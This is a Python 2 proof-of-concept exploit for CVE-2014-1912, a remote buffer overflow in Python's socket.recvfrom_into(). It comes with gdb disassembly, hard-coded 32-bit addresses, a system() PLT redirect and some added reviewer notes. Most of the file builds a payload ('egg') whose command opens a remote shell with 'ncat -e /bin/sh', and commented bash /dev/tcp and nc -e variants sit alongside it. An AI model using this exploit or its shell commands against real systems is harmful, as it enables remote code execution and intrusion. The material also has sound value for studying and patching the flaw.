#!/usr/bin/env python
'''
# Exploit Title: python socket.recvfrom_into() remote buffer overflow
# Date: 21/02/2014
# Exploit Author: @sha0coder
# Vendor Homepage: python.org
# Version: python2.7 and python3
# Tested on: linux 32bit + python2.7
# CVE : CVE-2014-1912

socket.recvfrom_into() remote buffer overflow
Proof of concept by @sha0coder
With NX evasion!

Reviewer notes (defensive context):
- This is a Python 2 script (print statements, str-as-bytes); it builds a
  payload file named 'egg' and does not itself contact any socket.
- The hard-coded addresses below are specific to the author's 32-bit Linux
  build; they are not portable, and struct.pack('L', ...) is native-size,
  so the offsets are 4 bytes only on a 32-bit interpreter.
- The underlying issue is in the interpreter's socket module, so the
  mitigation is to run a release that carries the fix for CVE-2014-1912;
  application code cannot patch around it reliably.

(gdb) x/i $eip
=> 0x817bb28: mov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full control
0x817bb2b: test BYTE PTR [eax+0x55],0x40
0x817bb2f: jne 0x817bb38 --> ...
0x817bb38: mov eax,DWORD PTR [eax+0xa4] <--- eax full control again
0x817bb3e: test eax,eax
0x817bb40: jne 0x817bb58 --> ...
0x817bb58: mov DWORD PTR [esp],ebx <---- ebx points to the beginning of the buffer [trash]||shell cmd[null byte]
0x817bb5b: call eax <--------------------- indirect fucktion call ;) will be redirected to system()
'''

import struct


def off(o):
    # Pack an integer as a native-endian, native-size unsigned long.
    # 'L' has no size prefix, so the width follows the running interpreter
    # (4 bytes on the 32-bit target this PoC was written against).
    return struct.pack('L', o)


# Unused ROP gadget table kept by the author for reference; not part of the payload.
'''
rop = {
    'pop eax': off(0x80795ac),
    'call eax': off(0x817bb5b),
    'xor eax': off(0x8061379),
    'mov [eax], edx': off(0x8078cf6),
    'xor edx, edx': off(0x80a60d1),
}
'''

# PLT entry the indirect call is redirected to (address specific to the author's build).
plt = {
    'system': off(0x805b7e0),
}

#addr2null = off(0x11111111)

ebx = 0xb7ae7908  # points to the beginning of the buff
eax = ebx
eax2 = ebx + 20  # not referenced when building `buff` below

# Filler sizes that place the controlled pointers at the offsets the
# disassembly above dereferences ([ebx+0x4], [eax+0xa4]).
padd2 = 'X' * (144)
padd1 = 'Y' * (8)

# Payload string handed to system(); the author's alternatives are left commented.
#system_command = 'bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'
#system_command = 'nc -e /bin/sh 127.0.0.1 1337'
system_command = 'ncat -e /bin/sh 127.0.0.1 1337'

'''
+------------+------------------+ +--------------------+
| | | | |
V | | | V
'''

# Layout: 4 bytes of trash, fake object pointer, padding, buffer pointer, padding,
# system@plt, then "||<command>" so the leading garbage is skipped by the shell's
# '||' operator. Terminated with a NUL because system() expects a C string.
buff = 'aaaa' + off(eax) + padd1 + off(ebx) + padd2 + plt['system'] + '||' + system_command + '\x00'  # thanks python strings ;)

print 'buff sz: %s' % len(buff)
# The file handle is never closed explicitly; it is released when the script exits.
open('egg', 'w').write(buff)
print 'egg file generated!!!'